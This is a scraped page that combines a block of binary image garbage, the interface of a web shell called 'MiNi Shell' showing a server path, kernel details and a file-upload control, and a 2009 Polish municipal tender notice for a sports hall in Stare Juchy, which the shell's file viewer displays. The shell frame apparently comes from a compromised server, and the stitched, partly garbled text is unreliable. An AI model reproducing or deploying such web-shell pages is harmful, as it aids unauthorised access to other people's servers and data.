JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090325/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090325/76734-N-2009.html

<p class="kh_header"><b>Stare Juchy: Budowa hali widowiskowo-sportowej przy Zespole Szkół Samorządowych w Starych Juchach</b><br>
<b>Numer ogłoszenia: 76734 - 2009; data zamieszczenia: 25.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stare Juchy , Plac 500-lecia 4, 19-330 Stare Juchy, woj. warmińsko-mazurskie, tel. 087 6199053, faks 087 6199053.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stare-juchy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa hali widowiskowo-sportowej przy Zespole Szkół Samorządowych w Starych Juchach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie zadania inwestycyjnego Budowa hali widowiskowo-sportowej przy Zespole Szkół Samorządowych w Starych Juchach
2. Zakres przedmiotu zamówienia obejmuje:
a) Budowę budynku hali widowiskowo-sportowej będącej budynkiem trzykondygnacyjnym, niepodpiwniczonym, o rzucie prostokąta o wymiarach 18,44 m x 40,785 m. Wysokość budynku - 9,78m. Główną konstrukcję nośną budynku stanowić będą słupy, wiązary i płatwie dachowe z drewna klejonego. Dach budynku płaski, dwuspadowy, kryty płytami warstwowymi z wypełnieniem pianką poliuretanową w okładzinach z blach metalowych. Ściany szczytowe budynku murowane z bloczków gazobetonowych oblicowanych cegła klinkierową. Ściany podłużne budynku zaprojektowano z płyt warstwowych z wypełnieniem wełną mineralną w okładzinach z blach metalowych w układzie podłużnym. Ściany wewnętrzne nośne budynku murowane z bloczków gazobetonowych.
b) Budowę budynku łącznika, który będzie usytuowany pomiędzy istniejącym budynkiem szkoły a nowobudowanym budynkiem hali. Budynek łącznika będzie budynkiem parterowym, niepodpiwniczonym o murowanej, z bloczków gazobetonowych konstrukcji ścian i drewnianej konstrukcji dachu. Dach płaski, dwuspadowy, kryty blachą trapezową. Łącznik umożliwiać będzie bezpośredni (z pominięciem szkoły) dostęp do hali z ulicy Kętrzyńskiego oraz z istniejącego boiska szkolnego. Wejście do łącznika od strony ulicy wyposażone zostanie w stałą pochylnię umożliwiającą dostęp do wszystkich, istniejących i nowobudowanych pomieszczeń zlokalizowanych na parterze zespołu szkół.
c) Poza budynkiem na działce 434 i w pasie drogowym ul. Kętrzyńskiego działki nr 455 lokalizuje się podjazdy i podejścia do nowobudowanych budynków, 10 miejsc parkingowych dla samochodów osobowych w tym jedne miejsce dla samochodu osobowego osoby niepełnosprawnej.
d) Wykonanie przyłączy kanalizacji sanitarnej, kanalizacji deszczowej oraz kanalizacji wodociągowej z dwoma hydrantami do celów ppoż. 
e) Wykonanie przyłącza elektrycznego zalicznikowego.
f) Wykonanie centralnego ogrzewania. 
3. Szczegółowy zakres przedmiotu zamówienia określają:
a) Dokumentacja projektowa - stanowiąca załącznik nr 8, 9, 10, 11, 12, 13, 14, 15, 16, 17 do SIWZ
b) Specyfikacje Techniczne Wykonania i Odbioru Robót - stanowiące załącznik nr 18, 19, 20, 21, 22, 23 do SIWZ
c) Wzór umowy stanowiący załącznik nr 7 do SIWZ
4. Obowiązkiem Wykonawcy jest przestrzeganie w toku realizacji robót, wymagań dotyczących stosowania materiałów budowlanych, wyrobów i urządzeń oraz sposobów wykonywania robót, wynikających z dokumentacji projektowej. 
5. Zaleca się, aby Wykonawca dokonał wizji lokalnej terenu budowy i jego otoczenia, a także zdobył, na swoją własną odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które jego zdaniem mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. Koszty wizji lokalnej terenu budowy ponosi Wykonawca.
6. Wykonawca zobowiązany jest do dokonywania uzgodnień z gestorami sieci uzbrojenia terenu i właścicielami oraz zarządcami terenu, w zakresie terminów wykonania robót i zajęcia gruntów oraz do uzyskania potwierdzeń właścicieli terenu dotyczących odtworzenia terenu do stanu pierwotnego.
7. Z wybranym Wykonawcą zostanie zawarta umowa za cenę ryczałtową obejmującą zakres rzeczowy zamówienia określony w niniejszej specyfikacji istotnych warunków zamówienia oraz projektach budowlanych i wykonawczych (zwaną dalej - dokumentacją projektową) i Specyfikacjach Technicznych Wykonania i Odbioru Robót, a także zastrzeżeń wynikających z wydanej decyzji pozwolenia na budowę.
8. Zamawiający dopuszcza rozliczenia za wykonane części robót. Podstawą do wystawienia faktury przejściowej będzie harmonogram rzeczowo - finansowy wykonany przez Wykonawcę oraz protokół wykonania i odbioru częściowego robót.
9. Podstawą wystawienia faktury końcowej rozliczenia będzie protokół końcowy odbioru oraz wydana decyzja pozwolenia na użytkowanie obiektu.
10. Zamawiający upoważni Wykonawcę do reprezentowania go i wykonywania wszelkich czynności przed organami administracji związanych z uzyskaniem decyzji pozwolenia na użytkowanie obiektu.
11. Załączone do SIWZ przedmiary robót mają wyłącznie charakter informacyjny i nie są obligatoryjne ani w zakresie przyjętych tam podstaw wyceny ani ilości wykazanych robót. Mogą być jedynie traktowane jako pomocnicze do przygotowania oferty cenowej.
12. Tam, gdzie w opisie przedmiotu zamówienia, na rysunkach, w Specyfikacjach Technicznych Wykonania i Odbioru Robót czy w przekazanych przedmiarach robót zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca) materiałów Zamawiający dopuszcza oferowanie materiałów równoważnych pod warunkiem, że zagwarantują one realizację robót w zgodzie z wydanym pozwoleniem na budowę oraz zapewnią uzyskanie parametrów technicznych nie gorszych od założonych w wyżej wymienionych dokumentach.
13. W przypadku jakichkolwiek wątpliwości udowodnienie równoważności spoczywa na Wykonawcy.
14. Wykonawca udzieli Zamawiającemu gwarancji i rękojmi na wykonany przedmiot umowy na okres co najmniej 36 miesięcy.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.20.00-6, 45.00.00.00-7, 45.10.00.00-8, 45.40.00.00-1, 45.22.00.00-5, 45.11.12.00-0, 45.20.00.00-9, 45.26.22.10-6, 45.26.25.00-6, 45.26.11.00-5, 45.26.12.10-9, 45.26.23.00-4, 45.26.21.00-2, 45.43.00.00-0, 45.44.20.00-7, 45.42.10.00-4, 45.23.32.20-7, 45.23.00.00-8, 45.33.11.00-7, 45.31.53.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępując do przetargu jest zobowiązany wnieść wadium w wysokości 40.000,00 zł (słownie: czterdzieści tysięcy złotych) przed upływem terminu składania ofert.
2. Wadium można wnieść w:
- pieniądzu,
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
- gwarancjach bankowych,
- gwarancjach ubezpieczeniowych,
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego : 
BS Ełk O/Stare Juchy Nr 22 9331 0004 0010 0100 0260 0002<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. 
2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - tj.:
a) Dysponują następującymi osobami, które zostaną wyznaczone do realizacji przedmiotu zamówienia :
- Kierownik budowy  musi posiadać odpowiednie uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlane i minimum 5 lat doświadczenia na danym stanowisku - jedna osoba.
- Kierownik robót drogowych  musi posiadać odpowiednie uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności drogowej i minimum 3 lat doświadczenia na danym stanowisku - jedna osoba.
- Kierownik robót sanitarnych musi posiadać odpowiednie uprawnienia budowlane bez ograniczeń w specjalności instalacji w zakresie sieci, instalacji i urządzeń kanalizacyjnych, wodociągowych, cieplnych i gazowych i minimum 3 lat doświadczenia na danym stanowisku - jedna osoba.
- Kierownik robót elektrycznych musi posiadać odpowiednie uprawnienia budowlane bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji urządzeń elektrycznych i elektroenergetycznych i minimum 3 lat doświadczenia na danym stanowisku - jedna osoba.
Osoby w/w muszą posiadać aktualne (ważne na dzień złożenia oferty) zaświadczenia o przynależności do właściwej Okręgowej Izby Inżynierów Budownictwa, zgodnie z ustawa z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U. z 2001, Nr 5, poz. 42 z późn. zm.).

b) Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres działalności jest krótszy - w tym okresie, wybudował  min. jeden obiekt użyteczności publicznej o wartości nie niższej niż 1.500.000 zł.
3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
a) Wykonawca musi posiadać środki finansowe w wysokości co najmniej 1.500.000 zł lub posiadać zdolność kredytowa w wysokości co najmniej 1.500.000 zł.
4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia. na podstawie art. 24 ustawy Prawo zamówień publicznych.

Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że:
a)	warunek określony w pkt 1 spełnia każdy z Wykonawców,
b)	warunek określony w pkt 2 spełniają łącznie wszyscy Wykonawcy,
c)	warunek określony w pkt 3 spełniają łącznie wszyscy Wykonawcy,
d)	warunek określony w pkt 4 spełnia każdy z Wykonawców.

Spełnienie warunków musi być potwierdzone odpowiednimi dokumentami i oświadczeniami dołączonymi do oferty (zgodnie z Rozdziałem IX SIWZ)
Ocena spełnionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Pzp - przedłoży następujące dokumenty i oświadczenia:
1.1. Oświadczenie o spełnieniu warunków udziału w postępowaniu (Załącznik nr 2 do SIWZ).
1.2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.3. Aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt od 4 do 8 ustawy Pzp, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.4. Aktualne informacje z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Pzp, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
1.5. Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
2. W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie, dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia oraz znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - oczekuje się złożenia następujących dokumentów i oświadczeń:
2.1. Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności (Załącznik nr 3 do SIWZ).
2.2. Pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 2.1., Wykonawca wskazał osoby, którymi będzie dysponował.
2.3. Dokumenty stwierdzające, że osoby o których mowa w pkt 2.1., które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane przez Zamawiającego uprawnienia budowlane oraz aktualne (ważne na dzień złożenia oferty) zaświadczenia o przynależności do właściwej Okręgowej Izby Inżynierów Budownictwa,  zgodnie z ustawa z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U. z 2001, Nr 5, poz. 42 z późn. zm.). 
2.4. Wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (Załącznik nr 4 do SIWZ).
2.5. Informacja z  banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów o których mowa:
1) pkt 1.2., 1.4. 1.5. - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono jego upadłości,
b) nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
2) w pkt 1.3. - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.
4. Dokumenty, o których mowa w ust. 3 pkt 1 lit. a i c oraz pkt 2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokumenty, o których mowa w ust. 3 pkt 1 lit. b, powinny być wystawione nie wcześniej niż 3 miesięcy przed upływem terminu składania ofert
5. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt 3. zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego  odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Zapis ust. 4 stosuje się odpowiednio.
6. Do oferty należy dołączyć również:
6.1. Formularz ofertowy - wypełniony i podpisany przez  Wykonawcę (Załącznik nr 1 do SIWZ). 
6.2. Informacje dotyczące podwykonawców (Załącznik nr 5 do SIWZ). Jeżeli Wykonawca nie przewiduje zatrudnienia podwykonawców wpisuje nie dotyczy.
6.3. Dowód wniesienia wadium. Dowód wniesienia wadium w formie innej niż pieniężna należy załączyć do oferty w formie ksera poświadczonego za zgodność z oryginałem.
6.4. Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z załączonych dokumentów. Załączone do oferty pełnomocnictwo winno być w formie oryginału lub kopii poświadczonej notarialnie.
6.5. Wypełniony formularz Tabela scalonych elementów rozliczeniowych (Załącznik nr 6 do SIWZ). 
6.6. Wzór umowy zaakceptowany przez  Wykonawcę (Załącznik nr 7 do SIWZ).
7. W przypadku złożenia oferty wspólnej:
a) Wykonawcy występujący wspólnie ubiegający się o udzielenie zamówienia musza ustanowić Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego a takie pełnomocnictwo musi być podpisane przez osoby upełnomocnione do reprezentowania wszystkich Wykonawców. Dokument winien zawierać: nazwę postępowania do którego się odnosi, precyzować zakres umocowania, wskazywać pełnomocnika, wyliczać wszystkich Wykonawców, którzy ubiegają się o to zamówienie, dokument winien być podpisany przez wszystkich Wykonawców.
b) Oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa w pkt 1.1. winni złożyć wszyscy partnerzy konsorcium na jednym formularzu lub lider w imieniu wszystkich..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.stare-juchy.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Stare Juchy
ul. Plac 500-lecia 4
19-330 Stare Juchy
pokój nr 3 (sekretariat).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.04.2009 godzina 09:00, miejsce: Urząd Gminy Stare Juchy
ul. Plac 500-lecia 4
19-330 Stare Juchy
pokój nr 3 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com